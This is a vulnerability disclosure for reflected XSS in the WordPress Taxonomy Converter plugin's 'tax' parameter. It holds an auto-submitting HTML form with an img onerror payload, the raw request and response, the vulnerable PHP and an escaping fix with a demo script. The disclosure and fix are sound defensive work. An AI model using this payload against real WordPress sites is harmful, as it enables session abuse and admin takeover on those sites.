Reflected XSS: Taxonomy Converter via tax parameter
Discovered by foobar7 on Wordpress

This issue took 4 Days and 23 hours to triage and 157 Days and 20 hours to close the report once triaged.



CVSS

Medium 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

The Taxonomy Converter plugin, listed on the official WordPress plugins page, is vulnerable to reflected XSS because it echoes the tax request parameter into an href attribute without encoding it.

POC

<html>
  <body>
    <form action="http://192.168.0.104/wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2" method="POST" enctype="text/plain">
      <input type="hidden" name="test" value="test
" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Request

POST /wordpress5/wordpress/wp-admin/admin.php?import=wptaxconvert&tax=categoryx'"><img+src%3dx+onerror%3dalert(1)>&step=2 HTTP/1.1
Host: 192.168.0.104
[...]

test=test

HTTP/1.1 200 OK
[...]

Uh, oh. Something didn’t work. Please <a href="admin.php?import=wptaxconvert&tax=categoryx\'\"><img src=x onerror=alert(1)>">try again</a>.

Code

/wp-content/plugins/taxonomy-converter/taxonomy-converter.php

function process($tax) {
    global $wpdb;

    if ( (!isset($_POST['terms_to_convert']) || !is_array($_POST['terms_to_convert'])) && empty($this->terms_to_convert) || (!isset($_POST['taxes'])) ) { ?>
        <div class="narrow">
        <?php printf(__('Uh, oh. Something didn’t work. Please <a href="%s">try again</a>.', 'wptaxconvert'), 'admin.php?import=wptaxconvert&tax='.$tax); ?>
        </div>
<?php        return;
    }

Solution

Apply esc_url or a similar escaping function (for example esc_attr) to $tax before passing it to printf, so that quote and angle-bracket characters in the parameter can no longer break out of the href attribute.
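As an added example (not the plugin's own code), the vulnerable link construction next to a hardened version in PHP. It assumes WordPress's esc_attr() and taxonomy_exists() and ships CLI shims for both so it runs outside WordPress; the taxonomy_exists() allow-list check is an extra layer beyond the escaping fix the Solution describes.

```php
<?php
// Added example, not the plugin's code. The shims below stand in for the
// WordPress helpers so the script runs from the CLI; inside WordPress the
// real esc_attr() and taxonomy_exists() are used instead.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $text ) {
        // esc_attr() is an htmlspecialchars(ENT_QUOTES)-style attribute encoder.
        return htmlspecialchars( $text, ENT_QUOTES, 'UTF-8' );
    }
}
if ( ! function_exists( 'taxonomy_exists' ) ) {
    // Constructed stand-in for the taxonomies registered on a test site.
    function taxonomy_exists( $taxonomy ) {
        return in_array( $taxonomy, array( 'category', 'post_tag' ), true );
    }
}

// Vulnerable construction, as in process(): $tax is concatenated raw into the
// href, so a quote in the parameter closes the attribute and the rest of the
// value is rendered as markup.
function retry_link_vulnerable( $tax ) {
    return sprintf( 'Please <a href="%s">try again</a>.',
        'admin.php?import=wptaxconvert&tax=' . $tax );
}

// Hardened construction with two independent layers: reject values that are
// not a registered taxonomy name (an allow-list added here), then
// attribute-encode the whole URL so " ' < > & cannot change the HTML context.
function retry_link_fixed( $tax ) {
    if ( ! taxonomy_exists( $tax ) ) {
        $tax = ''; // unknown name: link back without it instead of reflecting it
    }
    return sprintf( 'Please <a href="%s">try again</a>.',
        esc_attr( 'admin.php?import=wptaxconvert&tax=' . $tax ) );
}

// The tax value from the report, as PHP sees it after URL decoding.
$payload = 'categoryx\'"><img src=x onerror=alert(1)>';

echo "vulnerable: ", retry_link_vulnerable( $payload ), PHP_EOL;
echo "fixed:      ", retry_link_fixed( $payload ), PHP_EOL;
echo "fixed:      ", retry_link_fixed( 'category' ), PHP_EOL;
```

Run with `php fix.php`: the vulnerable line reproduces the broken-out markup seen in the response above, while the fixed lines keep every character of the URL inside the quoted attribute.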

Impact

With a successful attack, an attacker can access all data the attacked user has access to, as well as perform arbitrary requests in the name of the attacked user.

If the attacked user is an administrator, the attacker could for example create a new admin user and thus gain full control of the application (and depending on the settings, the server).